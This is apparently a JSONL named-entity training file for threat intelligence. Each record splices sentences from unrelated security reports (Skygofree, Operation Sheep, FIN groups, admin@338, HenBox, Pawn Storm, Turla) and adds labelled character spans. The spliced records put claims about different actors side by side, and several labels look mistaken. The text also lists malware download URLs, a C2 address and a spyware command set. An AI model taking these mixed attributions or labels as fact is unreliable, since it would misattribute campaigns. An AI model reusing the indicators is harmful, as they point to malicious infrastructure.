FIN4 is a financially motivated threat group that has targeted confidential information related to the public financial market , particularly regarding healthcare and pharmaceutical companies , since at least 2013 .", "spans": [{"start": 74, "end": 87, "label": "Indicator"}, {"start": 131, "end": 148, "label": "Indicator"}, {"start": 373, "end": 381, "label": "Malware"}, {"start": 521, "end": 525, "label": "Organization"}]} {"text": ") VALUES ( 1 , 1 , 1 , 1 , 0 ) Finally , the malware modifies the \u2018 Software\\Microsoft\\Windows\\CurrentVersion\\Run \u2019 registry key to enable autostart of the main module . While there is a clear underlying Qatar migrant workers theme in Operation Sheep , it is also hypothetically possible that these attacks could have been perpetrated by a malicious actor affiliated to a different government with an interest in damaging the reputation of the State of Qatar . FIN4 is unique in that they do not infect victims with typical persistent malware , but rather they focus on capturing credentials authorized to access email and other non-public correspondence .", "spans": [{"start": 68, "end": 113, "label": "Indicator"}, {"start": 235, "end": 250, "label": "Organization"}, {"start": 461, "end": 465, "label": "Organization"}, {"start": 613, "end": 618, "label": "System"}]} {"text": "The code contains multiple comments in Italian , here is the most noteworthy example : \u201c Receive commands from the remote server , here you can set the key commands to command the virus \u201d Here are the available commands : Name Description cd Change current directory to specified quit Close the socket nggexe Execute received command via Python \u2019 s subprocess.Popen ( ) without outputs ngguploads Upload specified file to the specified URL nggdownloads Download content from the specified URLs and save to specified file nggfilesystem Dump file structure of Dubbed \u2018Operation Sheep\u2019 , this massive data stealing campaign is the first known 
campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . FIN5 is a financially motivated threat group that has targeted personally identifiable information and payment card information .", "spans": [{"start": 338, "end": 344, "label": "System"}, {"start": 565, "end": 582, "label": "Organization"}, {"start": 681, "end": 696, "label": "Vulnerability"}, {"start": 764, "end": 768, "label": "Organization"}]} {"text": "the C : path , save it to the file in json format and zip it nggstart_screen nggstop_screen Enable/disable screenshot module . The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store . The group has been active since at least 2008 and has targeted the restaurant , gaming , and hotel industries .", "spans": [{"start": 131, "end": 134, "label": "System"}, {"start": 143, "end": 154, "label": "Malware"}, {"start": 270, "end": 283, "label": "Organization"}, {"start": 286, "end": 295, "label": "Organization"}, {"start": 298, "end": 314, "label": "Organization"}, {"start": 321, "end": 337, "label": "Organization"}]} {"text": "When enabled , it makes a screenshot every 25 seconds nggstart_key nggstop_key Enable/disable keylogging module nggstart_rec nggstop_rec Enable/disable surrounding sounds recording module ngg_status Send components status to the C & C socket * any other * Execute received command via Python \u2019 s subprocess.Popen ( ) , output result will be sent to the C & C socket . After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . 
The group is made up of actors who likely speak Russian .", "spans": [{"start": 285, "end": 291, "label": "System"}, {"start": 402, "end": 413, "label": "Malware"}, {"start": 502, "end": 509, "label": "Malware"}]} {"text": "All modules set hidden attributes to their files : Module Paths Exfiltrated data format msconf.exe % APPDATA % /myupd/gen/ % Y % m % d- % H % M % S_filesystem.zip ( file structure dump ) system.exe % APPDATA % /myupd/aud/ % d % m % Y % H % M % S.wav ( surrounding sounds ) update.exe % APPDATA % /myupd_tmp/txt/ % APPDATA % /myupd/txt/ % Y % m In theory , Shun Wang Technologies could have collected a third of China\u2019s population names and contact numbers if not more . FIN6 : ITG08 .", "spans": [{"start": 88, "end": 98, "label": "Indicator"}, {"start": 99, "end": 343, "label": "Indicator"}, {"start": 356, "end": 365, "label": "Organization"}, {"start": 470, "end": 474, "label": "Organization"}, {"start": 477, "end": 482, "label": "Organization"}]} {"text": "% d- % H % M % S.txt ( keylogging ) wow.exe % APPDATA % /myupd/scr/ % Y % m % d- % H % M % S.jpg ( screenshots ) skype_sync2.exe % APPDATA % /myupd_tmp/skype/ % APPDATA % /myupd/skype/ yyyyMMddHHmmss_in.mp3 yyyyMMddHHmmss_out.mp3 ( skype calls records ) Moreover , we found one module written With no clear declaration of usage from Shun Wang , nor proper regulatory supervision , such data could circulate into underground markets for further exploit , ranging from rogue marketing , targeted telephone scams or even friend referral program abuse during November\u2019s Single\u2019s Day and December\u2019s Asian online shopping fest . FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces .", "spans": [{"start": 207, "end": 229, "label": "Indicator"}, {"start": 333, "end": 342, "label": "Organization"}, {"start": 623, "end": 627, "label": "Organization"}]} {"text": "in .Net \u2013 skype_sync2.exe . 
This paper will cover the discovery of this campaign , dubbed \u2018Operation Sheep\u2019 , and an analysis of SWAnalytics . This group has aggressively targeted and compromised point of sale ( PoS ) systems in the hospitality and retail sectors .", "spans": [{"start": 3, "end": 7, "label": "System"}, {"start": 10, "end": 25, "label": "Indicator"}, {"start": 90, "end": 107, "label": "Organization"}]} {"text": "The main purpose of this module is to exfiltrate Skype call recordings . In mid-September , an app named \u2018Network Speed Master\u2019 stood out on our radar with its rather unusual behavior patterns . Leviathan : TEMP.Jumper , APT40 , TEMP.Periscope .", "spans": [{"start": 49, "end": 54, "label": "System"}, {"start": 105, "end": 127, "label": "Organization"}, {"start": 195, "end": 204, "label": "Organization"}, {"start": 207, "end": 218, "label": "Organization"}, {"start": 221, "end": 226, "label": "Organization"}, {"start": 229, "end": 243, "label": "Organization"}]} {"text": "Just like the previous modules , it contains multiple strings in Italian . This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge . 
Leviathan is a cyber espionage group that has been active since at least 2013 .", "spans": [{"start": 80, "end": 86, "label": "Malware"}, {"start": 140, "end": 164, "label": "Malware"}, {"start": 167, "end": 173, "label": "Malware"}, {"start": 176, "end": 182, "label": "Malware"}, {"start": 185, "end": 198, "label": "Malware"}, {"start": 203, "end": 217, "label": "Malware"}, {"start": 220, "end": 229, "label": "Organization"}]} {"text": "After launch , it downloads a codec for MP3 encoding directly from the C & C server : http : //54.67.109.199/skype_resource/libmp3lame.dll The skype_sync2.exe module has a compilation timestamp \u2013 Feb 06 2017 and the following PDB string : \\\\vmware-host\\Shared Folders\\dati\\Backup\\Projects\\REcodin_2\\REcodin_2\\obj\\x86\\Release\\REcodin_2.pdb network.exe is a It turns out that contacts data isn\u2019t the only unusual data SWAnalytics is interested in . The group generally targets defense and government organizations , but has also targeted a range of industries including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities in the United States , Western Europe , and along the South China Sea .", "spans": [{"start": 86, "end": 138, "label": "Indicator"}, {"start": 143, "end": 158, "label": "Indicator"}, {"start": 239, "end": 259, "label": "Indicator"}, {"start": 260, "end": 338, "label": "Indicator"}, {"start": 339, "end": 350, "label": "Indicator"}, {"start": 374, "end": 387, "label": "Malware"}, {"start": 416, "end": 427, "label": "Malware"}]} {"text": "module for submitting all exfiltrated data to the server . With default settings , SWAnalytics will scan through an Android device\u2019s external storage , looking for directory tencent/MobileQQ/WebViewCheck\u201d . 
Lotus Blossom : DRAGONFISH , Spring Dragon .", "spans": [{"start": 83, "end": 94, "label": "Malware"}, {"start": 100, "end": 104, "label": "Malware"}, {"start": 207, "end": 220, "label": "Organization"}, {"start": 223, "end": 233, "label": "Organization"}, {"start": 236, "end": 249, "label": "Organization"}]} {"text": "In the observed version of the implant it doesn \u2019 t have an interface to work with the skype_sync2.exe module . From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category . Lotus Blossom is a threat group that has targeted government and military organizations in Southeast Asia .", "spans": [{"start": 87, "end": 102, "label": "Indicator"}, {"start": 127, "end": 143, "label": "Malware"}, {"start": 291, "end": 304, "label": "Organization"}]} {"text": "network.exe submitting to the server code snippet Code similarities We found some code similarities between the implant for Windows and other public accessible projects . By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . Machete : El Machete .", "spans": [{"start": 0, "end": 11, "label": "Indicator"}, {"start": 124, "end": 131, "label": "System"}, {"start": 174, "end": 193, "label": "Malware"}, {"start": 196, "end": 207, "label": "Malware"}, {"start": 219, "end": 236, "label": "Malware"}, {"start": 280, "end": 287, "label": "Organization"}, {"start": 290, "end": 300, "label": "Organization"}]} {"text": "https : //github.com/El3ct71k/Keylogger/ It appears the developers have copied the functional part of the keylogger module from this project . Operation Sheep is the first campaign we have observed in the wild that abuses similar concept since our MitD publication . 
Machete is a group that has been active since at least 2010 , targeting high-profile government entities in Latin American countries .", "spans": [{"start": 0, "end": 40, "label": "Indicator"}, {"start": 143, "end": 158, "label": "Organization"}, {"start": 267, "end": 274, "label": "Organization"}]} {"text": "update.exe module and Keylogger by \u2018 El3ct71k \u2019 code comparison Xenotix Python Keylogger including specified mutex \u2018 mutex_var_xboz \u2019 . To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control . admin@338 is a China based cyber threat group .", "spans": [{"start": 0, "end": 10, "label": "Indicator"}, {"start": 64, "end": 88, "label": "System"}, {"start": 186, "end": 197, "label": "Malware"}, {"start": 220, "end": 227, "label": "Malware"}, {"start": 232, "end": 259, "label": "Malware"}, {"start": 267, "end": 273, "label": "Malware"}, {"start": 296, "end": 305, "label": "Organization"}]} {"text": "update.exe module and Xenotix Python Keylogger code comparison \u2018 addStartup \u2019 method from msconf.exe module \u2018 addStartup \u2019 method from Xenotix Python Keylogger Distribution We found several landing pages that spread the Android implants . Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json\u201d . 
It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial , economic , and trade policy , typically using publicly available RATs such as PoisonIvy , as well as some non-public backdoors .", "spans": [{"start": 0, "end": 10, "label": "Indicator"}, {"start": 22, "end": 46, "label": "System"}, {"start": 90, "end": 100, "label": "Indicator"}, {"start": 135, "end": 159, "label": "System"}, {"start": 220, "end": 227, "label": "System"}, {"start": 308, "end": 319, "label": "Malware"}, {"start": 616, "end": 620, "label": "Malware"}, {"start": 629, "end": 638, "label": "Malware"}, {"start": 657, "end": 677, "label": "Malware"}]} {"text": "Malicious URL Referrer Dates http : //217.194.13.133/tre/internet/Configuratore_3.apk http : //217.194.13.133/tre/internet/ 2015-02-04 to present time http : //217.194.13.133/appPro_AC.apk \u2013 2015-07-01 http : //217.194.13.133/190/configurazione/vodafone/smartphone/VODAFONE % 20Configuratore % 20v5_4_2.apk http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html In order to understand SWAnalytics\u2019 impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets . 
APT1 : Comment Crew , Comment Group , Comment Panda .", "spans": [{"start": 29, "end": 85, "label": "Indicator"}, {"start": 86, "end": 123, "label": "Indicator"}, {"start": 151, "end": 188, "label": "Indicator"}, {"start": 202, "end": 306, "label": "Indicator"}, {"start": 307, "end": 380, "label": "Indicator"}, {"start": 404, "end": 416, "label": "Malware"}, {"start": 586, "end": 590, "label": "Organization"}, {"start": 593, "end": 605, "label": "Organization"}, {"start": 608, "end": 621, "label": "Organization"}, {"start": 624, "end": 637, "label": "Organization"}]} {"text": "2015-01-20 to present time http : //217.194.13.133/190/configurazione/vodafone/smartphone/Vodafone % 20Configuratore.apk http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html currently active http : //vodafoneinfinity.sytes.net/tim/internet/Configuratore_TIM.apk http : //vodafoneinfinity.sytes.net/tim/internet/ 2015-03-04 http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/VODAFONE Data points span from September 2018 to January 2019 where we observed over 17 million downloads in just five months . 
APT1 is a Chinese threat group that has been attributed to the 2nd Bureau of the People \u2019s Liberation Army ( PLA ) General Staff Department \u2019s ( GSD ) 3rd Department , commonly known by its Military Unit Cover Designator ( MUCD ) as Unit 61398 .", "spans": [{"start": 27, "end": 120, "label": "Indicator"}, {"start": 121, "end": 194, "label": "Indicator"}, {"start": 212, "end": 282, "label": "Indicator"}, {"start": 283, "end": 332, "label": "Indicator"}, {"start": 344, "end": 427, "label": "Indicator"}, {"start": 487, "end": 489, "label": "Organization"}, {"start": 547, "end": 551, "label": "Organization"}, {"start": 610, "end": 653, "label": "Organization"}, {"start": 656, "end": 659, "label": "Organization"}, {"start": 662, "end": 689, "label": "Organization"}, {"start": 692, "end": 695, "label": "Organization"}, {"start": 698, "end": 712, "label": "Organization"}, {"start": 737, "end": 767, "label": "Organization"}, {"start": 770, "end": 774, "label": "Organization"}, {"start": 780, "end": 790, "label": "Organization"}]} {"text": "% 20Configuratore % 20v5_4_2.apk http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/ 2015-01-14 http : //windupdate.serveftp.com/wind/LTE/WIND % 20Configuratore % 20v5_4_2.apk http : //windupdate.serveftp.com/wind/LTE/ 2015-03-31 http : //119.network/lte/Internet-TIM-4G-LTE.apk http : //119.network/lte/download.html In China alone , we have seen underground market sheep shavers\u201d ported SMS rogue marketing strategy to spread Alipay Red Packet referral URL links . 
APT12 : IXESHE , DynCalc , Numbered Panda , DNSCALC .", "spans": [{"start": 33, "end": 108, "label": "Indicator"}, {"start": 120, "end": 199, "label": "Indicator"}, {"start": 200, "end": 242, "label": "Indicator"}, {"start": 254, "end": 302, "label": "Indicator"}, {"start": 303, "end": 341, "label": "Indicator"}, {"start": 391, "end": 405, "label": "Organization"}, {"start": 491, "end": 496, "label": "Organization"}, {"start": 499, "end": 505, "label": "Organization"}, {"start": 508, "end": 515, "label": "Organization"}, {"start": 518, "end": 532, "label": "Organization"}, {"start": 535, "end": 542, "label": "Organization"}]} {"text": "2015-02-04 2015-07-20 http : //119.network/lte/Configuratore_TIM.apk 2015-07-08 Many of these domains are outdated , but almost all ( except one \u2013 appPro_AC.apk ) samples located on the 217.194.13.133 server are still accessible . In Operation Sheep\u2019s case , Shun Wang likely harvests end user contact lists without application developer acknowledgement . APT12 is a threat group that has been attributed to China .", "spans": [{"start": 22, "end": 68, "label": "Indicator"}, {"start": 147, "end": 160, "label": "Indicator"}, {"start": 186, "end": 200, "label": "Indicator"}, {"start": 259, "end": 268, "label": "Organization"}, {"start": 356, "end": 361, "label": "Organization"}]} {"text": "All the observed landing pages mimic the mobile operators \u2019 web pages through their domain name and web page content as well . According to Cheetah Mobile\u2019s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK . 
The group has targeted a variety of victims including but not limited to media outlets , high-tech companies , and multiple governments .", "spans": [{"start": 233, "end": 240, "label": "Malware"}, {"start": 243, "end": 249, "label": "Malware"}, {"start": 268, "end": 279, "label": "Malware"}, {"start": 355, "end": 368, "label": "Organization"}, {"start": 371, "end": 390, "label": "Organization"}, {"start": 397, "end": 417, "label": "Organization"}]} {"text": "Further research of the attacker \u2019 s infrastructure revealed more related mimicking domains . It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns . The admin@338 has largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors .", "spans": [{"start": 125, "end": 130, "label": "Organization"}, {"start": 145, "end": 157, "label": "System"}, {"start": 222, "end": 227, "label": "Organization"}, {"start": 298, "end": 310, "label": "Malware"}, {"start": 327, "end": 336, "label": "Organization"}, {"start": 384, "end": 393, "label": "Organization"}, {"start": 396, "end": 404, "label": "Organization"}, {"start": 409, "end": 421, "label": "Organization"}, {"start": 459, "end": 463, "label": "Malware"}, {"start": 472, "end": 482, "label": "Malware"}, {"start": 498, "end": 518, "label": "Malware"}]} {"text": "Unfortunately , for now we can \u2019 t say in what environment these landing pages were used in the wild , but according to all the information at our disposal , we can assume that they are perfect for exploitation using malicious redirects or man-in-the-middle attacks . Webinjects targeting Japan , a country we haven\u2019t seen targeted by Panda Banker before . 
The admin@338 started targeting Hong Kong media companies , probably in response to political and economic challenges in Hong Kong and China .", "spans": [{"start": 335, "end": 347, "label": "Malware"}, {"start": 361, "end": 370, "label": "Organization"}, {"start": 399, "end": 414, "label": "Organization"}, {"start": 441, "end": 450, "label": "Organization"}, {"start": 455, "end": 463, "label": "Organization"}]} {"text": "For example , this could be when the victim \u2019 s device connects to a Wi-Fi access point that is infected or controlled by the attackers . Japan is no stranger to banking malware . Multiple China-based cyber threat groups have targeted international media organizations in the past .", "spans": [{"start": 162, "end": 169, "label": "Malware"}, {"start": 170, "end": 177, "label": "Malware"}, {"start": 235, "end": 268, "label": "Organization"}]} {"text": "Artifacts During the research , we found plenty of traces of the developers and those doing the maintaining . Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware . The admin@338 has targeted international media organizations in the past .", "spans": [{"start": 186, "end": 192, "label": "Malware"}, {"start": 197, "end": 204, "label": "Malware"}, {"start": 227, "end": 236, "label": "Organization"}, {"start": 250, "end": 283, "label": "Organization"}]} {"text": "As already stated in the \u2018 malware features \u2019 part , there are multiple giveaways in the code . This post was our first analysis of the first Panda Banker campaign that we\u2019ve seen to target financial institutions in Japan . 
In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television .", "spans": [{"start": 142, "end": 154, "label": "Malware"}, {"start": 190, "end": 212, "label": "Organization"}, {"start": 245, "end": 254, "label": "Organization"}, {"start": 275, "end": 281, "label": "System"}, {"start": 313, "end": 332, "label": "Organization"}]} {"text": "Here are just some of them : ngglobal \u2013 FirebaseCloudMessaging topic name Issuer : CN = negg \u2013 from several certificates negg.ddns [ . Operation Pawn Storm is an active economic and political cyber-espionage operation that targets a wide range of entities , like the military , governments , defense industries , and the media . In August 2015 , the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television .", "spans": [{"start": 121, "end": 134, "label": "Indicator"}, {"start": 135, "end": 155, "label": "Organization"}, {"start": 169, "end": 177, "label": "Organization"}, {"start": 182, "end": 191, "label": "Organization"}, {"start": 267, "end": 275, "label": "Organization"}, {"start": 278, "end": 289, "label": "Organization"}, {"start": 292, "end": 310, "label": "Organization"}, {"start": 321, "end": 326, "label": "Organization"}, {"start": 357, "end": 363, "label": "Organization"}, {"start": 384, "end": 390, "label": "System"}, {"start": 422, "end": 441, "label": "Organization"}]} {"text": "] net , negg1.ddns [ . We believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows\u2019 systems . 
In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations .", "spans": [{"start": 8, "end": 22, "label": "Indicator"}, {"start": 23, "end": 25, "label": "Organization"}, {"start": 135, "end": 141, "label": "Malware"}, {"start": 218, "end": 227, "label": "Organization"}, {"start": 248, "end": 254, "label": "System"}, {"start": 286, "end": 305, "label": "Organization"}]} {"text": "] net , negg2.ddns [ . We found two malicious iOS applications in Operation Pawn Storm . The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": [{"start": 8, "end": 22, "label": "Indicator"}, {"start": 23, "end": 25, "label": "Organization"}, {"start": 93, "end": 102, "label": "Organization"}, {"start": 131, "end": 140, "label": "Organization"}, {"start": 145, "end": 165, "label": "Organization"}, {"start": 205, "end": 211, "label": "System"}, {"start": 254, "end": 263, "label": "Organization"}]} {"text": "] net \u2013 C & C servers NG SuperShell \u2013 string from the reverse shell payload ngg \u2013 prefix in commands names of the implant for Windows Signature with specific issuer Whois records and IP relationships provide many interesting insights as well . One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ XAGENT.B . 
Once the LOWBALL malware calls back to the Dropbox account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer .", "spans": [{"start": 126, "end": 133, "label": "System"}, {"start": 258, "end": 264, "label": "Malware"}, {"start": 277, "end": 289, "label": "Malware"}, {"start": 349, "end": 355, "label": "Malware"}, {"start": 373, "end": 381, "label": "Malware"}, {"start": 393, "end": 400, "label": "Malware"}, {"start": 401, "end": 408, "label": "Malware"}, {"start": 427, "end": 434, "label": "System"}, {"start": 449, "end": 458, "label": "Organization"}, {"start": 485, "end": 495, "label": "Indicator"}]} {"text": "There are a lot of other \u2018 Negg \u2019 mentions in Whois records and references to it . The obvious goal of the SEDNIT-related spyware is to steal personal data , record audio , make screenshots , and send them to a remote command-and-control (C&C) server . We observed the admin@338 upload a second stage malware , known as BUBBLEWRAP ( also known as Backdoor.APT.FakeWinHTTPHelper ) to their Dropbox account along with the following command .", "spans": [{"start": 107, "end": 121, "label": "Organization"}, {"start": 142, "end": 155, "label": "Organization"}, {"start": 269, "end": 278, "label": "Organization"}, {"start": 320, "end": 330, "label": "Malware"}, {"start": 347, "end": 377, "label": "Malware"}, {"start": 389, "end": 396, "label": "System"}]} {"text": "For example : Conclusions The Skygofree Android implant is one of the most powerful spyware tools that we have ever seen for this platform . Madcap\u201d is similar to the XAgent malware , but the former is focused on recording audio . 
We have previously observed the admin@338 group use BUBBLEWRAP .", "spans": [{"start": 30, "end": 39, "label": "Malware"}, {"start": 40, "end": 47, "label": "System"}, {"start": 141, "end": 148, "label": "Malware"}, {"start": 167, "end": 173, "label": "Malware"}, {"start": 263, "end": 278, "label": "Organization"}, {"start": 283, "end": 293, "label": "Malware"}]} {"text": "As a result of the long-term development process , there are multiple , exceptional capabilities : usage of multiple exploits for gaining root privileges , a complex payload structure , never-before-seen surveillance features such as recording surrounding audio in specified locations . To learn more about this campaign , you may refer to our report , Operation Pawn Storm Using Decoys to Evade Detection . The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets .", "spans": [{"start": 390, "end": 405, "label": "Organization"}, {"start": 412, "end": 419, "label": "Malware"}, {"start": 514, "end": 524, "label": "Malware"}]} {"text": "Given the many artifacts we discovered in the malware code , as well as infrastructure analysis , we are pretty confident that the developer of the Skygofree implants is an Italian IT company that works on surveillance solutions , just like HackingTeam . Additionally , we discovered a new DNS hijacking technique that we assess with moderate confidence is connected to the actors behind Sea Turtle . 
The admin@338 linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong .", "spans": [{"start": 148, "end": 157, "label": "Malware"}, {"start": 241, "end": 252, "label": "Organization"}, {"start": 374, "end": 380, "label": "Organization"}, {"start": 405, "end": 414, "label": "Organization"}, {"start": 498, "end": 509, "label": "Organization"}]} {"text": "HenBox : The Chickens Come Home to Roost March 13 , 2018 at 5:00 AM Unit 42 recently discovered a new Android malware family we named \u201c HenBox \u201d masquerading as a variety of legitimate Android apps . Talos now has moderate confidence that the threat actors behind Sea Turtle have been using another DNS hijacking technique . An APT gang linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 102, "end": 109, "label": "System"}, {"start": 136, "end": 142, "label": "Malware"}, {"start": 185, "end": 192, "label": "System"}, {"start": 200, "end": 205, "label": "Organization"}, {"start": 332, "end": 336, "label": "Organization"}, {"start": 420, "end": 431, "label": "Organization"}]} {"text": "We chose the name \u201c HenBox \u201d based on metadata found in most of the malicious apps such as package names and signer detail . This technique was also observed against a government organizations in the Middle East and North African region . 
The group targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy .", "spans": [{"start": 20, "end": 26, "label": "Malware"}, {"start": 269, "end": 274, "label": "Organization"}, {"start": 293, "end": 302, "label": "Organization"}, {"start": 360, "end": 381, "label": "Malware"}, {"start": 390, "end": 400, "label": "Malware"}, {"start": 411, "end": 421, "label": "Organization"}, {"start": 426, "end": 441, "label": "Organization"}, {"start": 458, "end": 473, "label": "Organization"}]} {"text": "HenBox masquerades as apps such as VPN and Android system apps and often installs legitimate versions of these apps along with HenBox to trick users into thinking they downloaded the legitimate app . Cisco telemetry confirmed that the actors behind Sea Turtle maintained access to the ICS-Forth network from an operational command and control (C2) node . 
The agroup targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 43, "end": 50, "label": "System"}, {"start": 127, "end": 133, "label": "Malware"}, {"start": 200, "end": 205, "label": "Organization"}, {"start": 335, "end": 347, "label": "System"}, {"start": 359, "end": 365, "label": "Organization"}, {"start": 386, "end": 391, "label": "Organization"}, {"start": 410, "end": 419, "label": "Organization"}, {"start": 477, "end": 498, "label": "Malware"}, {"start": 507, "end": 517, "label": "Malware"}, {"start": 528, "end": 538, "label": "Organization"}, {"start": 543, "end": 558, "label": "Organization"}, {"start": 575, "end": 590, "label": "Organization"}]} {"text": "While some of the legitimate apps HenBox use as decoys can be found on Google Play , HenBox apps themselves have only been found on third-party ( non-Google Play ) app stores . Our telemetry indicates that the actors maintained access in the ICS-Forth network through at least April 24 , five days after the statement was publicly released . 
The admin@338 , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors .", "spans": [{"start": 34, "end": 40, "label": "Malware"}, {"start": 71, "end": 82, "label": "System"}, {"start": 85, "end": 91, "label": "Malware"}, {"start": 157, "end": 161, "label": "System"}, {"start": 210, "end": 216, "label": "Organization"}, {"start": 346, "end": 355, "label": "Organization"}, {"start": 423, "end": 441, "label": "Organization"}, {"start": 444, "end": 452, "label": "Organization"}, {"start": 455, "end": 465, "label": "Organization"}, {"start": 472, "end": 487, "label": "Organization"}]} {"text": "HenBox appears to primarily target the Uyghurs \u2013 a minority Turkic ethnic group that is primarily Muslim and lives mainly in the Xinjiang Uyghur Autonomous Region in North West China . This full-blown spying framework consists of two packages named \u2018Tokyo\u2019 and \u2018Yokohama\u2019 . The APT actor , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 249, "end": 256, "label": "Malware"}, {"start": 261, "end": 271, "label": "Malware"}, {"start": 278, "end": 287, "label": "Organization"}, {"start": 355, "end": 373, "label": "Organization"}, {"start": 376, "end": 384, "label": "Organization"}, {"start": 387, "end": 397, "label": "Organization"}, {"start": 404, "end": 419, "label": "Organization"}]} {"text": "It also targets devices made by Chinese manufacturer Xiaomi and those running MIUI , an operating system based on Google Android made by Xiaomi . Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . 
In August 2013 , FireEye reported that admin@338 had been using the Poison Ivy RAT in its operations .", "spans": [{"start": 53, "end": 59, "label": "Organization"}, {"start": 78, "end": 82, "label": "System"}, {"start": 114, "end": 128, "label": "System"}, {"start": 137, "end": 143, "label": "Organization"}, {"start": 183, "end": 191, "label": "Malware"}, {"start": 203, "end": 213, "label": "Malware"}, {"start": 295, "end": 302, "label": "Organization"}, {"start": 317, "end": 326, "label": "Organization"}, {"start": 346, "end": 360, "label": "Malware"}]} {"text": "Smartphones are the dominant form of internet access in the region and Xinjiang was recently above the national average of internet users in China . The first confirmed date when TajMahal samples were seen on a victim\u2019s machine is August 2014 . In March 2014 , the admin@338 leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank .", "spans": [{"start": 179, "end": 187, "label": "Malware"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 349, "end": 359, "label": "Organization"}, {"start": 402, "end": 412, "label": "Organization"}]} {"text": "The result is a large online population who have been the subject of numerous cyber-attacks in the past . More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com) . 
In March 2014 , the group leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank .", "spans": [{"start": 125, "end": 133, "label": "Malware"}, {"start": 168, "end": 177, "label": "Organization"}, {"start": 348, "end": 358, "label": "Organization"}, {"start": 401, "end": 411, "label": "Organization"}]} {"text": "Once installed , HenBox steals information from the devices from a myriad of sources , including many mainstream chat , communication , and social media apps . The dropper first appeared in mid-July , suggesting that this APT activity is potentially ongoing , with Turla actively targeting G20 participants and/or those with interest in the G20 , including member nations , journalists , and policymakers . According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": [{"start": 17, "end": 23, "label": "Malware"}, {"start": 265, "end": 270, "label": "Organization"}, {"start": 290, "end": 293, "label": "Organization"}, {"start": 420, "end": 427, "label": "Organization"}, {"start": 434, "end": 443, "label": "Organization"}, {"start": 453, "end": 459, "label": "System"}, {"start": 503, "end": 510, "label": "Vulnerability"}, {"start": 511, "end": 527, "label": "Organization"}, {"start": 528, "end": 543, "label": "Vulnerability"}, {"start": 594, "end": 601, "label": "Malware"}]} {"text": "The stolen information includes personal and device information . Turla is a well-documented , long operating APT group that is widely believed to be a Russian state-sponsored organization . 
